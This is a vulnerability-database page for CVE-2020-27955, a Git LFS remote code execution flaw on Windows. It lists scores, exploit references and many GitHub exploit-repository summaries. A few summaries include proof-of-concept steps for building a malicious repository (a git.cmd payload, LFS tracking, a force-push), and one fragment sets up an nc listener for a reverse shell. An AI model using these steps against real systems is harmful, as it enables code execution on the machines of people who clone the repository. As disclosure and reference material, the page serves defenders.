Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
9.8
CVSSv3

CVE-2020-27955

Published: 05/11/2020 Updated: 16/12/2021
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 896
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Git Large File Storage

Vulnerability Summary

Git LFS 2.12.0 allows Remote Code Execution.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

git large file storage project git large file storage 2.12.0

Exploits

Exploit DB: git-lfs Remote Code Execution
Proof of concept git-lfs remote code execution exploit written in Go Affects Git, GitHub CLI, GitHub Desktop, Visual Studio, GitKraken, SmartGit, SourceTree, and more ...
Exploit DB: Git git-lfs Remote Code Execution
This Metasploit modules exploits a critical vulnerability in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, which allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool ...

Mailing Lists

Full Disclosure: Git LFS (git-lfs) - Remote Code Execution (RCE) exploit CVE-2020-27955 - Clone to Pwn
<!--X-Body-Begin--> <!--X-User-Header--> Full Disclosure mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> Git LFS (git-lfs) - Remote Code Execution (RCE) exploit CVE-2020-27955 - Clone to Pwn <!--X-Subject-Header-End--> <!-- ...

Github Repositories

https://github.com/Kimorea/CVE-2020-27955-LFS

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

https://github.com/userxfan/cve-2020-27955

cve-2020-27955

cve-2020-27955 cve-2020-27955

https://github.com/YiboW4ng/test9069

CVE-2020-27955 Git-LFS Remote Code Execution Vulnerability Git LFS is a Git extension developed by Github to implement Git‘s support for large files Remote code execution issue found on Git-LFS versions &lt;= 212 on Windows platforms Git LFS vulnerability allows attackers to compromise targets’ Windows systems It allows attackers to achieve remote code execu

https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (Go version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Basica

https://github.com/ycdxsb/PocOrExp_in_Github

聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网。Auto Collect Poc Or Exp from Github by CVE ID.

PocOrExp in Github 聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网 注意:只通过通用的CVE号聚合,因此对于MS17-010等Windows编号漏洞以及著名的有绰号的漏洞,还是自己检索一下比较好 Usage python3 exppy -h usage: exppy [-h] [-y {1999,2000,2001,2002,2003,2004,2005,2006,2007,20

https://github.com/pierce403/githax

githax exploitboxio/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955html

https://github.com/r00t4dm/CVE-2020-27955

CVE-2020-27955 Thanks mediumcom/bugbountywriteup/git-lfs-exploit-for-remote-code-execution-cve-2020-27955-e8f4786163c3

https://github.com/zero4v/cve-2020-27955

cve-2020-27955

cve-2020-27955 cve-2020-27955 复现 创建github仓库 git clone githubcom/attacker/pocgit echo calcexe &gt; gitcmd git lfs track “*dat” echo “Junk” &gt; largedat git add -A git commit -m “POC” git push -u origin master -f

https://github.com/TheTh1nk3r/cve-2020-27955

cve-2020-27955

cve-2020-27955 cve-2020-27955 复现 创建github仓库 git clone githubcom/attacker/pocgit echo calcexe &gt; gitcmd git lfs track “*dat” echo “Junk” &gt; largedat git add -A git commit -m “POC” git push -u origin master -f

https://github.com/ZZZWD/POC

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

https://github.com/z50913/CVE-2020-27955

CVE-2020-27955漏洞复现 1、win机下载有漏洞的版本Git-LFS 下载地址:githubcom/git-for-windows/git/releases/tag/v2292windows1 2、win机安装,添加如下信息host文件,10115即是nc监听8888的主机(可自行替换) 10115 abcallxyz 3、10115主机,nc启监听口8888 ┌──(root㉿hostname)-[~] └─# nc Cmd line: -l -p 88

https://github.com/qzyqzynb/git-lfs-poc

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

https://github.com/WizZYou/git-lfs-RCE-exploit-CVE-2020-27955-revshell

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

https://github.com/Marsable/CVE-2020-27955-LFS

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955

Git-lfs RCE exploit CVE-2020-27955 - tested on Windows on: git, gh cli, GitHub Desktop, Visual Studio, SourceTree etc.

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

https://github.com/userxfan/cve

cve

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

https://github.com/exileddb/CVE-2020-27955

CVE-2020-27955

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

https://github.com/githubfollow/ssh-reverse-git-RCE

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

https://github.com/whitetea2424/CVE-2020-27955-LFS-main

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

https://github.com/DeeLMind/CVE-2020-27955-LFS

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

https://github.com/qzyqzynb/CVE-2020-27955

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version) Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc Discovered by Dawid Golunski legalhackerscom exploitboxio Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

References

CWE-427https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.htmlhttps://legalhackers.comhttps://exploitbox.iohttps://github.com/git-lfs/git-lfs/releaseshttp://seclists.org/fulldisclosure/2020/Nov/1http://packetstormsecurity.com/files/159923/git-lfs-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/164180/Git-git-lfs-Remote-Code-Execution.htmlhttps://nvd.nist.govhttp://seclists.org/fulldisclosure/2020/Nov/1https://github.com/userxfan/cve-2020-27955
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
deserializationCVE-2024-4040cross-site scriptingCVE-2023-25790CVE-2024-2961XML external entityCVE-2024-26926CVE-2024-32806CVE-2024-32711
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook